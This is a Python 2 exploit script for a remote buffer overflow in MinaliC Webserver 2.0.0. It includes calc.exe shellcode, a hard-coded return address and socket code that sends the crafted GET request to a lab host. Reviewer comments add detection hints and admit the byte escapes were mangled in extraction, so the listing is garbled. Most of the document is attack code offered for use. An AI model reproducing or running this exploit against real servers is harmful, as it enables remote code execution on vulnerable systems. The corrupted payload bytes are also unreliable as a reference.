MinaliC Webserver 2.0.0 Buffer Overflow
Posted on 16 April 2013
#!/usr/bin/env python
# Exploit Title: MinaliC Webserver buffer overflow
# Date: 12 Apr 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP2, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# request.
#
# Reviewer notes (defensive):
# - This is Python 2 code (the bare `print` statement below); it does not
#   run unmodified on Python 3.
# - As reproduced on this page the listing appears to have lost characters
#   in extraction: the string literals read as the plain text "x31", "x41",
#   "x90" rather than as single bytes, and the install path in the comment
#   reads "C:minalicin". The byte counts quoted in the original comments
#   therefore do not match what this text actually builds; treat it as a
#   reference description of the issue rather than a verbatim copy.
# - The description and the fixed EIP offset indicate a stack-based overflow
#   triggered by an over-long request-target (the path after "GET /"). The
#   server-side fix is to bounds-check that copy, or to retire/replace the
#   server. The return address used below is hard-coded for one specific
#   ntdll.dll build, so the technique as written presumably depends on a
#   non-randomized module base.

import socket
import struct

# 74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/
# Proof-of-concept payload (launches calc.exe). NOTE(review): as printed,
# len(shellcode) is the character count of the text below, not 74 bytes.
shellcode = (
    "x31xd2x52x68x63x61x6cx63x89xe6x52x56x64x8bx72" +
    "x30x8bx76x0cx8bx76x0cxadx8bx30x8bx7ex18x8bx5f" +
    "x3cx8bx5cx1fx78x8bx74x1fx20x01xfex8bx4cx1fx24" +
    "x01xf9x0fxb7x2cx51x42xadx81x3cx07x57x69x6ex45" +
    "x75xf1x8bx74x1fx1cx01xfex03x3cxaexffxd7xcc"
)

# EIP at offset 245 when minalic.exe is in C:minalicin
# EBX points directly to the "Host:" value, so we put our shellcode there.
# JMP EBX @ 0x7C955B47, NTDLL.DLL, Windows XP Pro SP2 English
#
# Detection angle: as intended, the request carries a 245-byte request-target
# made of a single repeated byte followed by a 4-byte little-endian address
# (which includes a non-ASCII byte), and a Host header value of
# 30 + 74 + 31 = 135 bytes that is mostly 0x90 padding. An oversized
# request-target or Host value, or a Host value containing non-ASCII bytes,
# is a reasonable alert condition in front of this server.
junk = "x41" * 245                              # filler up to the saved return address
ret = struct.pack("<I", 0x7C955B47)             # little-endian address that overwrites EIP
host = "x90" * 30 + shellcode + "x90" * 31      # padding on both sides of the payload
buf = "GET /" + junk + ret + " HTTP/1.1 " + "Host: " + host + " "
# NOTE(review): the request-line and header separators appear as single
# spaces here -- see the extraction note in the header.

print "[+] sending buffer size", len(buf)       # Python 2 print statement

# Single TCP connection to the lab host from the original post; nothing is
# read back and the socket is never closed explicitly (it is released when
# the interpreter exits).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.132", 8080))
s.send(buf)
